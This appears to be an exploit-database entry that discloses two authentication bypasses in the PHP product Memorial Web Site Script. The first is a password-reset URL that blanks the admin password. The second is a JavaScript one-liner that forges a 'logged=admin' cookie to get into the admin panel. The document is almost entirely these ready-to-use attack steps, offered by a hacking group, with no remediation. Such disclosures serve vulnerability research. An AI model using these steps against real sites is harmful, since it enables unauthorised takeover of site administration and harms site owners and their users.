EXPLOITS

Memorial Web Site Script - Reset Password / Insecure Cookie Handling

Author: Chip d3 bi0s
type: webapps
platform: php
port: 
date_added: 2010-04-22  
date_updated:   
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 12358.txt  

-----------------------------------------------------------------------
Memorial Web Site Script --> Reset Password & Insecure Cookie Handling
-----------------------------------------------------------------------
Author	: Chip D3 Bi0s
Email	: chipdebios[alt+64]gmail.com
Where	: From Remote
Group	: LatinHackTeam


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application	: Memorial Web Site Script
Author		: Easy Scripts
Price		: $49
Vendor		: http://www.easy-scripts.net

description Bug:
~~~~~~~~~~~~~~~

To reset the password just use this:

http://127.0.0.1/[path]/admin/change_pass.php

so the password will be null, login with single user can
admin:

http://127.0.0.1/[path]/admin/

--------------------------

Insecure Cookie Handling

exploit:
javascript:document.cookie="logged=admin;path=/";

http://127.0.0.1/[path]/admin/
--------------------------



+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++